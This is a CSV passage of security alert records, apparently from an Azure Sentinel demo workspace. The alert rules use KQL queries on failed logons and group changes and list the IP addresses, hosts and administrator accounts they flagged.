""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-10T06%3A25%3A57.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""11752"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0"",
""Total Account Entities"": ""1716"",
""Total Host Entities"": ""1"",
""Total IP Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""80.10.26.89"",
""Type"": ""ip"",
""Count"": 11752
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 11752
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 3845
},
{
""$id"": ""6"",
""Name"": ""Administrator"",
""NTDomain"": ""DHCPContoso77"",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 2218
},
{
""$id"": ""7"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 722
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-10 06:36:03,,,
32,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-10 19:18:10,2019-01-10 20:18:10,6a52c089-ed6b-4a05-859c-d731ad9f2b32,b3f02c05-e844-4161-81d6-d736548d91ae,CustomAlertRule,Alert Rule,Suspicious Account Added,Suspicious Account Added,Suspicious Account Added,Account added and removed from group within 24h,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""timeInterval\"":{\""intervalDuration\"":3600,\""intervalEnd\"":\""2019-01-10T20%3A18%3A10.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""1"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""60"",
""Suppression in Minutes"": ""720""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-10 20:38:16,,,
33,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-13 06:33:55,2019-01-14 06:33:55,6a4e389d-9678-41ee-93a3-ca8ae818c8b0,985be534-6f40-4b0c-a951-8f3915eacd61,CustomAlertRule,Alert Rule,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,Domain controllers with Microsoft antimalware core engine failure,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-14T06%3A33%3A55.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""33167"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-14 06:44:00,,,
34,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-13 19:18:10,2019-01-13 20:18:10,f115c35a-88b0-4d16-9aa3-977a45278297,790217fc-9597-4159-b469-bb383c747435,CustomAlertRule,Alert Rule,Suspicious Account Added,Suspicious Account Added,Suspicious Account Added,Account added and removed from group within 24h,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""timeInterval\"":{\""intervalDuration\"":3600,\""intervalEnd\"":\""2019-01-13T20%3A18%3A10.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""1"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""60"",
""Suppression in Minutes"": ""720""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-13 20:28:13,,,
35,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-12 06:33:55,2019-01-13 06:33:55,63ca5203-9bc4-425e-9f25-e9dcfaedb443,6a7aaa2e-a575-4e8b-87ed-0d964bf1005e,CustomAlertRule,Alert Rule,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,Domain controllers with Microsoft antimalware core engine failure,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-13T06%3A33%3A55.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25435"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-13 06:43:59,,,
36,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-12 05:38:06,2019-01-13 05:38:06,d0b18c55-6af1-482b-a050-7e7ca1ae923d,bc44b302-78c7-4be8-bf70-d39d6935fd74,CustomAlertRule,Alert Rule,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust was created on Active Directory,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-13T05%3A38%3A06.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25542"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""1000"",
""Total IP Entities"": ""1"",
""Total Account Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""23.54.94.45"",
""Type"": ""ip"",
""Count"": 25542
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25542
},
{
""$id"": ""5"",
""Name"": ""brians"",
""UPNSuffix"": ""ContosoSI.onmicrosoft.com"",
""IsDomainJoined"": true,
""Type"": ""account"",
""Count"": 25542
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-13 05:48:09,,,
37,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-12 06:25:57,2019-01-13 06:25:57,806b0946-13f8-4882-96fc-5b81ef4af691,c76f17e2-e739-4e7e-bf17-4dd163fc831f,CustomAlertRule,Alert Rule,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication was identified based on TI,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-13T06%3A25%3A57.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25449"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0"",
""Total Account Entities"": ""1598"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""80.10.26.89"",
""Type"": ""ip"",
""Count"": 25449
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25449
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 5223
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 1353
},
{
""$id"": ""7"",
""Name"": ""ADMINISTRATÖR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 579
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-13 06:36:03,,,
38,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-12 06:31:40,2019-01-13 06:31:40,a6c60b76-dcdf-45c5-be56-9d98f5649e50,07be11df-3dbf-49a5-8b5a-dcea75d89993,CustomAlertRule,Alert Rule,DC local group addition - Demo,DC local group addition - Demo,DC local group addition - Demo,Domain controllers local group addition,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-13T06%3A31%3A40.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25431"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""800"",
""Total Account Entities"": ""1597"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""75.10.91.22"",
""Type"": ""ip"",
""Count"": 25431
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25431
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 5222
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 1356
},
{
""$id"": ""7"",
""Name"": ""ADMINISTRATÖR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 578
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-13 06:41:45,,,
39,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-12 06:31:42,2019-01-13 06:31:42,e586082e-35d2-4a01-9fd3-e9cd91259c99,09ec519f-96b0-4332-be30-b0379c8cbd04,CustomAlertRule,Alert Rule,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-13T06%3A31%3A42.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25430"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""2000"",
""Total Account Entities"": ""1597"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""92.52.10.25"",
""Type"": ""ip"",
""Count"": 25430
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25430
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 5222
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 1356
},
{
""$id"": ""7"",
""Name"": ""ADMINISTRATÖR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 578
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-13 06:41:46,,,
40,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-13 05:38:06,2019-01-14 05:38:06,7b758942-59cd-4b84-93f1-50517a6a9316,5d733fc8-ff32-436d-a595-beaf8943bd63,CustomAlertRule,Alert Rule,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust was created on Active Directory,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-14T05%3A38%3A06.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""32769"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""1000"",
""Total Account Entities"": ""1"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""23.54.94.45"",
""Type"": ""ip"",
""Count"": 32769
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 32769
},
{
""$id"": ""5"",
""Name"": ""brians"",
""UPNSuffix"": ""ContosoSI.onmicrosoft.com"",
""IsDomainJoined"": true,
""Type"": ""account"",
""Count"": 32769
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-14 05:48:14,,,
41,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-13 06:31:40,2019-01-14 06:31:40,7aa7c6b9-e08b-4229-90fa-d89a23cfa9df,47445dca-b87d-45f5-9073-b713e3c69a56,CustomAlertRule,Alert Rule,DC local group addition - Demo,DC local group addition - Demo,DC local group addition - Demo,Domain controllers local group addition,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-14T06%3A31%3A40.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""33169"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""800"",
""Total Account Entities"": ""1631"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""75.10.91.22"",
""Type"": ""ip"",
""Count"": 33169
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 33169
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 10662
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 1764
},
{
""$id"": ""7"",
""Name"": ""ADMINISTRATÖR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 952
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-14 06:41:46,,,
42,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-13 06:31:42,2019-01-14 06:31:42,03ec4bb4-878f-4999-8ff7-af9a66e11c78,45176796-d3f9-40ce-a8f2-aba9bb3c8063,CustomAlertRule,Alert Rule,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-14T06%3A31%3A42.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""33170"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""2000"",
""Total Account Entities"": ""1631"",
""Total Host Entities"": ""1"",
""Total IP Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""92.52.10.25"",
""Type"": ""ip"",
""Count"": 33170
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 33170
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 10662
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 1764
},
{
""$id"": ""7"",
""Name"": ""ADMINISTRATÖR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 952
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-14 06:41:52,,,
43,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-13 06:25:57,2019-01-14 06:25:57,68cd3c80-5b36-49e1-82a9-395b5e793626,54a8f6d8-f69b-4872-96f8-ef274d5fc8d4,CustomAlertRule,Alert Rule,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication was identified based on TI,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-14T06%3A25%3A57.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""33154"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0"",
""Total Account Entities"": ""1631"",
""Total Host Entities"": ""1"",
""Total IP Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""80.10.26.89"",
""Type"": ""ip"",
""Count"": 33154
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 33154
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 10645
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 1765
},
{
""$id"": ""7"",
""Name"": ""ADMINISTRATÖR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 949
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-14 06:36:02,,,
44,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 21:18:10,2019-01-15 22:18:10,3197aa65-2708-4a36-82dd-55fc3ed3f01d,cbdce694-666c-4844-a29c-e7f4b66e27d1,CustomAlertRule,Alert Rule,Suspicious Account Added,Suspicious Account Added,Suspicious Account Added,Account added and removed from group within 24h,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""timeInterval\"":{\""intervalDuration\"":3600,\""intervalEnd\"":\""2019-01-15T22%3A18%3A10.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""1"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""60"",
""Suppression in Minutes"": ""720""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 22:28:16,,,
